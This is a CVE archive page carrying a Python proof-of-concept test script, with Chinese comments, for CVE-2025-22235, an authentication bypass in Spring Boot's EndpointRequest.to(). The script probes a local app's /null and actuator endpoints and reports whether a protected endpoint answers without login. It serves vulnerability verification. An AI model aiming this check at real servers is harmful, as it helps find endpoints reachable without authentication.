4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-22235
README.md
Rendering markdown...
POC / test_vulnerability.py PY
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env python3
"""
CVE-2025-22235 漏洞测试脚本
用于验证Spring Boot EndpointRequest.to()认证绕过漏洞
"""

import requests
import sys
import time

def test_vulnerability():
    """测试CVE-2025-22235漏洞"""
    base_url = "http://localhost:8080"
    
    print("=" * 60)
    print("CVE-2025-22235 漏洞测试")
    print("=" * 60)
    
    # 测试1: 访问受保护的/null端点(应该被绕过)
    print("\n[测试1] 访问受保护的 /null 端点...")
    try:
        response = requests.get(f"{base_url}/null", timeout=10)
        if response.status_code == 200:
            print("❌ 漏洞存在!未登录即可访问受保护的端点")
            print(f"   响应内容: {response.text}")
            print("   这证明了CVE-2025-22235认证绕过漏洞")
        else:
            print(f"✅ 端点受保护,状态码: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"❌ 请求失败: {e}")
        return False
    
    # 测试2: 访问其他受保护的端点(应该要求认证)
    print("\n[测试2] 访问其他受保护的端点...")
    try:
        response = requests.get(f"{base_url}/info", timeout=10)
        if response.status_code == 401 or response.status_code == 302:
            print("✅ 端点正常受保护,要求认证")
        else:
            print(f"⚠️  端点状态异常,状态码: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"❌ 请求失败: {e}")
    
    # 测试3: 访问健康检查端点
    print("\n[测试3] 访问健康检查端点...")
    try:
        response = requests.get(f"{base_url}/actuator/health", timeout=10)
        if response.status_code == 404:
            print("✅ health端点未暴露(符合漏洞触发条件)")
        else:
            print(f"⚠️  health端点状态: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"❌ 请求失败: {e}")
    
    # 测试4: 访问info端点
    print("\n[测试4] 访问info端点...")
    try:
        response = requests.get(f"{base_url}/actuator/info", timeout=10)
        if response.status_code == 200:
            print("✅ info端点正常暴露")
        else:
            print(f"⚠️  info端点状态: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"❌ 请求失败: {e}")
    
    print("\n" + "=" * 60)
    print("测试完成")
    print("=" * 60)
    
    return True

def check_server_status():
    """检查服务器是否运行"""
    try:
        response = requests.get("http://localhost:8080", timeout=5)
        return True
    except:
        return False

if __name__ == "__main__":
    print("CVE-2025-22235 漏洞测试脚本")
    print("请确保Spring Boot应用已启动在 http://localhost:8080")
    
    # 检查服务器状态
    if not check_server_status():
        print("❌ 服务器未运行,请先启动Spring Boot应用")
        print("   使用命令: mvn spring-boot:run")
        sys.exit(1)
    
    # 执行测试
    test_vulnerability()